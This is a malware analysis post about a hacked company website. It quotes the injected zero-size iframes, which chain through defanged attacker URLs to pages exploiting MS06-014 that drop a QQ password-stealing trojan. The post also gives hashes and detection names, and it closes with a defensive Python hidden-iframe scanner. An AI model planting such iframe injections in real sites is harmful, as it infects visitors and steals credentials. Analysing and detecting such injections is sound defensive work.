Trojan-PSW.Win32.QQPass.ahe / Trojan.PSW.Win32.QQPass.qpr
Original by Endurer
Version 1
When opening the company's website, Kaspersky reported:
/---
Detected: Trojan program Trojan-Downloader.VBS.Small.ca URL: hxxp://user**.free**2.7*71*69.net/ayayxi/hz2.htm
Detected: malicious program Exploit.JS.ADODB.Stream.y URL: hxxp://user**.free**2.7*71*69.net/ayayxi/hz3.htm
Detected: Trojan program Trojan-Downloader.VBS.Small.dc URL: hxxp://user**.free**2.7*71*69.net/ayayxi/hz4.htm
---/
Checking the page's source code, I found:
/---
<iframe src="hxxp://user**.free***2.7*71*69.net/ayayxi/jxy.htm" width="0" height="0" frameborder="0"></iframe>
---/
The code of hxxp://user**.free**2.7*71*69.net/ayayxi/jxy.htm includes:
/---
<iframe src="hxxp://user**.free***2.7*71*69.net/ayayxi/hz.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://user**.free***2.7*71*69.net/ayayxi/hz1.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://user**.free***2.7*71*69.net/ayayxi/hz2.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://user**.free***2.7*71*69.net/ayayxi/hz3.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://user**.free***2.7*71*69.net/ayayxi/hz4.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://user**.free***2.7*71*69.net/ayayxi/z/hz5.htm" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://user**.free**2.7*71*69.net/ayayxi/hz.htm failed to open.
hxxp://user**.free***2.7*71*69.net/ayayxi/hz1.htm contains JavaScript code that takes advantage of the MS06-014 (msadco.dll) vulnerability to download ke.exe, save it as C:/boot.exe, and run it.
File description: D:/test/ke.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 13:36:44
Modification time: 13:37:16
Access time: 13:38:15
Size: 47203 bytes, 46.99 KB
MD5: 6e53bf373369486950315e9462dee47a
SHA1: 2b14b97fca6bc3ca41cb477e9abb92d7465e66f4
CRC32: 85f05bbe
Kaspersky detects it as: Trojan program Trojan-PSW.Win32.QQPass.ahe File: D:/test/ke.exe/nspack
Rising reports it as: Trojan.PSW.Win32.QQPass.qpr
The pages
hxxp://user**.free**2.7*71*69.net/ayayxi/hz2.htm
hxxp://user**.free**2.7*71*69.net/ayayxi/hz3.htm
hxxp://user**.free**2.7*71*69.net/ayayxi/hz4.htm
contain VBScript code that uses the serious MS06-014 (msadco.dll) vulnerability to download ke.exe to the temporary folder, save it under the file name svchost.exe, and run it.
hxxp://user**.free**2.7*71*69.net/ayayxi/hz5.htm failed to open.
Google has marked the website as a website that may contain malware and may harm your computer.
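The injected code above is a zero-size IFRAME pointing at another host, which then nests further zero-size IFRAMEs. The following is an added example, not part of the original post: a small Python check a site owner can run over their own pages to flag hidden iframes and mark the off-site ones. The function and class names are hypothetical, and the sample HTML and host names are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

def _is_zero(value):
    """True for zero dimensions such as '0', ' 0 ', '0px' or '0%'."""
    digits = (value or "").strip().lower().rstrip("px%").strip()
    return digits.replace(".", "", 1).isdigit() and float(digits) == 0

def _hidden_by_style(style):
    s = (style or "").replace(" ", "").lower()
    return "display:none" in s or "visibility:hidden" in s

class HiddenIframeFinder(HTMLParser):
    """Collects iframes the visitor cannot see, resolved to absolute URLs."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.page_host = urlparse(page_url).hostname
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":          # HTMLParser lower-cases tag and attribute names
            return
        a = dict(attrs)
        src = a.get("src")
        if not src:
            return
        hidden = (_is_zero(a.get("width")) or _is_zero(a.get("height"))
                  or _hidden_by_style(a.get("style")))
        if not hidden:
            return
        target = urljoin(self.page_url, src.strip())
        offsite = urlparse(target).hostname != self.page_host
        self.findings.append({"src": target, "offsite": offsite})

def find_hidden_iframes(html, page_url):
    finder = HiddenIframeFinder(page_url)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample page: one visible iframe, one injected-style, one same-site hidden.
SAMPLE_PAGE = """<iframe src="/widgets/map.html" width="600" height="400"></iframe>
<IFRAME src="http://injected.example.invalid/a/jxy.htm" width="0" Height="0" frameborder="0"></IFRAME>
<iframe src="/tracking/pixel.html" style="display: none"></iframe>"""

if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE_PAGE, "http://www.example.com/index.html"):
        print("OFF-SITE " if f["offsite"] else "same-site", f["src"])
```

A hidden off-site iframe that nobody on the web team added is the case to investigate first; the same check can then be applied to the page it points to in order to follow the nesting.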